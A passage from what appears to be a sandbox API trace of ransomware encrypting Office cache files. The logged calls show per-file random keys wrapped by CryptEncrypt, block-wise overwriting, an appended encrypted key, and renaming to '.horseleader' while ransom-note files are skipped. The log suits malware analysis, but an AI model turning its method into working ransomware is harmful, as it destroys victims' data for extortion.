lpSrch=".horseleader") returned 0x0 [0211.991] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="#Decrypt#.txt") returned 1 [0211.991] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="_uninstalling_.png") returned 1 [0211.991] lstrlenW (lpString=".testttjffg") returned 11 [0211.991] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi", lpSrch=".testttjffg") returned 0x0 [0211.991] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0211.991] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0211.991] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0211.991] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0211.991] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".txt") returned 0x0 [0211.992] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=868864) returned 1 [0211.992] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.992] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.998] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0211.998] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0211.998] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x67900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0211.998] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.008] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.008] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.009] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xcf200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.009] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.015] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.015] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.015] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.015] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.016] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.016] CloseHandle (hObject=0x21c) returned 1 [0212.016] GetProcessHeap () returned 0x780000 [0212.016] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.016] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.horseleader") returned 95 [0212.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.horseleader")) returned 1 [0212.017] GetProcessHeap () returned 0x780000 [0212.017] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.017] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0212.017] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Windows") returned -1 [0212.017] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0212.017] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".horseleader") returned 0x0 [0212.017] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="#Decrypt#.txt") returned 1 [0212.017] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="_uninstalling_.png") returned 1 [0212.017] lstrlenW (lpString=".testttjffg") returned 11 [0212.017] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpSrch=".testttjffg") returned 0x0 [0212.017] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.018] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.018] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.018] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0212.018] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".txt") returned 0x0 [0212.018] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=819) returned 1 [0212.018] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x333, lpOverlapped=0x0) returned 1 [0212.030] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.030] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x333, lpOverlapped=0x0) returned 1 [0212.031] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.031] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.031] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.031] CloseHandle (hObject=0x21c) returned 1 [0212.032] GetProcessHeap () returned 0x780000 [0212.032] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.032] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.horseleader") returned 95 [0212.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.horseleader")) returned 1 [0212.033] GetProcessHeap () returned 0x780000 [0212.033] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.033] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0212.033] lstrcmpiW (lpString1="osetupui.dll", lpString2="Windows") returned -1 [0212.033] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0212.033] StrStrIW (lpFirst="osetupui.dll", lpSrch=".horseleader") returned 0x0 [0212.033] lstrcmpW (lpString1="osetupui.dll", lpString2="#Decrypt#.txt") returned 1 [0212.033] lstrcmpW (lpString1="osetupui.dll", lpString2="_uninstalling_.png") returned 1 [0212.033] lstrlenW (lpString=".testttjffg") returned 11 [0212.034] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll", lpSrch=".testttjffg") returned 0x0 [0212.034] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.034] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.034] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.034] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0212.034] StrStrW (lpFirst="osetupui.dll", lpSrch=".txt") returned 0x0 [0212.035] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=191872) returned 1 [0212.035] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.035] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.038] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.038] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.039] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.039] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.043] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.043] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.043] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x29d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.043] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.085] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.085] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.085] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.086] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.086] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.086] CloseHandle (hObject=0x21c) returned 1 [0212.086] GetProcessHeap () returned 0x780000 [0212.086] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.086] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.horseleader") returned 91 [0212.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.horseleader")) returned 1 [0212.087] GetProcessHeap () returned 0x780000 [0212.087] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.087] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0212.087] lstrcmpiW (lpString1="pss10r.chm", lpString2="Windows") returned -1 [0212.087] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0212.087] StrStrIW (lpFirst="pss10r.chm", lpSrch=".horseleader") returned 0x0 [0212.087] lstrcmpW (lpString1="pss10r.chm", lpString2="#Decrypt#.txt") returned 1 [0212.088] lstrcmpW (lpString1="pss10r.chm", lpString2="_uninstalling_.png") returned 1 [0212.088] lstrlenW (lpString=".testttjffg") returned 11 [0212.088] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", lpSrch=".testttjffg") returned 0x0 [0212.088] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.088] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.088] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.088] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0212.088] StrStrW (lpFirst="pss10r.chm", lpSrch=".txt") returned 0x0 [0212.088] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=27195) returned 1 [0212.088] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.104] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.105] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x1a3b, lpOverlapped=0x0) returned 1 [0212.118] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffe5c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.118] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x1a3b, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x1a3b, lpOverlapped=0x0) returned 1 [0212.118] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.119] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0212.119] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0212.119] CloseHandle (hObject=0x21c) returned 1 [0212.119] GetProcessHeap () returned 0x780000 [0212.119] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0212.119] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.horseleader") returned 89 [0212.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.horseleader")) returned 1 [0212.120] GetProcessHeap () returned 0x780000 [0212.120] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0212.120] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0212.121] lstrcmpiW (lpString1="setup.chm", lpString2="Windows") returned -1 [0212.121] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0212.121] StrStrIW (lpFirst="setup.chm", lpSrch=".horseleader") returned 0x0 [0212.121] lstrcmpW (lpString1="setup.chm", lpString2="#Decrypt#.txt") returned 1 [0212.121] lstrcmpW (lpString1="setup.chm", lpString2="_uninstalling_.png") returned 1 [0212.121] lstrlenW (lpString=".testttjffg") returned 11 [0212.121] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm", lpSrch=".testttjffg") returned 0x0 [0212.121] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0212.121] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0212.121] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0212.122] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0212.122] StrStrW (lpFirst="setup.chm", lpSrch=".txt") returned 0x0 [0212.122] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=67190) returned 1 [0212.122] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.122] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.156] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0212.156] SetFilePointerEx (in: 